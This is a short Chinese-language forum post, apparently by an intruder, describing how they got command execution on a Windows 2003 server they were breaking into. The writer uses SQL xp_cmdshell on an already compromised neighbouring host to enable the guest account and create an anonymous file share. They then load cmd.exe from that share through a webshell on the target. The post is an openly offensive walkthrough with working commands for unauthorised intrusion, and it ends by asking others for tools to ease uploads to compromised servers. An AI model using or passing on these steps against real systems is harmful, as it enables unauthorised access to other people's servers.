最近在入侵Win2003时发现缺省情况下无法利用系统自带的cmd.exe文件来执行系统命令，上传cmd.exe文件时因为文件太大而失败，后来我通过一台相邻机器的文件共享成功上传了cmd.exe文件，具体过程如下：
我们已经获得了相邻机器（192.168.1.1）的管理员权限，利用SQL的xp_cmdshell命令执行以下的操作：
    net user guest /active:yes 打开guest用户以允许文件共享的匿名访问
    net share web=d:\web    将本机的WEB目录共享
 
   然后在目标机上的WEBSHELL上如下进行输入：\\192.168.1.1\web\cmd.exe

   最后将上图中的SHELL路径改为c:\cmd.exe即可正常运行系统命令。

   由于cmd.exe可以通过打包上传到服务器，我建议哪位高手写一个基于ASP的RAR解压软件来方便2003服务器下的上传cmd.exe程序